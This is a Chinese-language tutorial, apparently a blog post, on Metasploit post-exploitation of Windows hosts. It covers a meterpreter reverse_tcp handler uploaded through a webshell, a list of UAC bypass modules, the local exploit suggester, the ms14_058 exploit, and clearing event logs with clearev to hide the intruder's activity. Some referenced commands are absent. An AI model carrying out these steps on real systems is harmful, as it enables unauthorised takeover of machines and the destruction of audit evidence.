Metaspolit下UAC提權以及

在獲得webshell時但權限不夠大，這時候為了完全獲得受害者機器的權限，使用msf進行後滲透。

一、擷取Meterpreter會話

Meterpreter 是msf的一個payload，目标執行之後，我們會得到一個會話，和常見的shell會話類似，但是它的功能更加強大，它是執行後滲透測試的實施通道。

(1) 使用msfvenom生成payload

常用指令：

(2)本地監聽

監聽需要用到msf的exploit/multi/handler子產品，使用show options檢視需要設定的參數。重要的參數有三個：監聽使用的payload、本地ip、本地監聽端口。這些參數的值跟之前msfvenom使用的參數一樣。

Msfconsole 打開Metaploit

msf>use exploit/multi/handler
           

set payload windows/meterpreter/reverse_tcp
           

set LHOST 192.168.204.129
           

(3)将生成的payload通過webshell上傳到伺服器

要上傳到可讀寫的區域并執行

成功監聽獲得meterpreter（一個session（會話））

Getuid 檢視主機名

也可以輸入shell變成指令行模式，輸入exit傳回到meterpeter shell模式

輸入background指令讓目前會話儲存到背景

使用sessions指令可以檢視所有背景的會話，每個session對應一個id值，後面會經常用到。

(4)Exploit 進行提權(UAC提權)

使用者帳戶控制（UAC）是微軟在 Windows Vista 以後版本引入的一種安全機制，有助于防止對系統進行未經授權的更改。應用程式和任務可始終在非管理者帳戶的安全上下文中運作，除非管理者專門給系統授予管理者級别的通路權限。UAC 可以阻止未經授權的應用程式進行自動安裝，并防止無意中更改系統設定。

msf提供了bypassuac子產品幫助繞過UAC：

在使用bypassuac子產品進行提權時，目前使用者必須在管理者組中，且UAC必須為預設設定(既“僅在程式試圖更改我的計算機時通知我”)，bypassuac子產品運作時，會在目标機器上建立多個檔案，這些檔案很有可能會被防毒軟體識别。

bypassuac子產品介紹

use exploit/windows/local/bypassuac

#該子產品運作時會因為在目标機上建立多個檔案而被防毒軟體識别，是以通過該子產品提權成功率很低。

use exploit/windows/local/bypassuac_injection

#該子產品直接運作在記憶體的反射DLL中，是以不會接觸目标機器的硬碟，進而降低了被防毒軟體檢測出來的機率

use exploit/windows/local/bypassuac_fodhelper

# 該子產品通過在目前使用者配置單元下劫持系統資料庫中的特殊鍵，并插入将在啟動Windows fodhelper.exe應用程式時調用的自定義指令來繞過Windows 10 UAC

use exploit/windows/local/bypassuac_eventvwr

#該子產品通過在目前使用者配置單元下劫持系統資料庫中的特殊鍵，并插入将在啟動Windows fodhelper.exe應用程式時調用的自定義指令來繞過Windows 10 UAC

use exploit/windows/local/bypassuac_comhijack

#此子產品将通過在HKCU配置單元中，建立COM處理程式系統資料庫項來繞過Windows UAC。當加載某些高完整性程序時将會引用這些系統資料庫項，進而導緻程序加載使用者控制的DLL。這些DLL中包含了可提升權限的payload。該子產品需要通過目标系統上的cmd.exe來調用目标二進制檔案，是以如果限制cmd.exe通路，則此子產品将無法正常運作。

use exploit/windows/local/bypassuac_windows_store

#通過模拟可信目錄繞過UAC

use exploit/windows/local/bypassuac_sdclt

#Sdclt用于Windows備份和還原機制的上下文中

1.第一次嘗試三個子產品都無法獲得權限

因為webshell權限隻是user，這需要權限在adminisartor組中

bypassuac 執行成功後會傳回一個新的 meterpreter，此時再輸入 shell 進入系統 cmd 檢視權限，權限級别已經由 medium 變成了 high。

除此之外還有很多其他的提權腳本，可以根據 systeminfo 查出來的更新檔和提權腳本做對比，若相關的利用腳本沒有安裝相應的更新檔，則可針對性的進行提權操作。

這裡用bypassuac_injection成功提權

但是對新版的的win10沒有一個可以成功繞過。

2.也可以嘗試使用windwos的漏洞進行提權

可以用metaspolit的内置子產品

use post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester
           

set session id

#id是已經獲得的session号

當我們用它來探測某一個系統時，他會告訴我們該系統有哪些exploit可能可以利用

use post/multi/recon/local_exploit_suggester
           

詳細利用在另一篇文章

發現可能的漏洞後可以找到對應exp的子產品：

如ms13_053,ms14_058,ms16_016,ms16_032等。下面以ms14_058為例。

msf5 > use exploit/windows/local/ms14_058_track_popup_menu
msf5 > exploit(ms14_058_track_popup_menu) > set session 1
msf5 > exploit(ms14_058_track_popup_menu) > exploit
           

日志清除

清除日志

再進入殭屍電腦執行一些操作時，windows 下記錄的記錄檔可在日志檢視器中進行檢視，可以通過運作 eventvwr 指令打開。

包括了應用程式、系統、安全等子產品的日志，為了不讓其查到自己或知道自己的操作，則可以使用 meterpreter 的 clearev 指令來清除其日志。

未清除日志前可檢視系統記錄的一些處理資訊。

然後在 meterpreter 下執行 clearev 指令，可以看到清除提示，分别清除了應用程式，系統和安全子產品的日志記錄。

指令運作後，再到靶機的日志檢視器中檢視，日志已經被清除。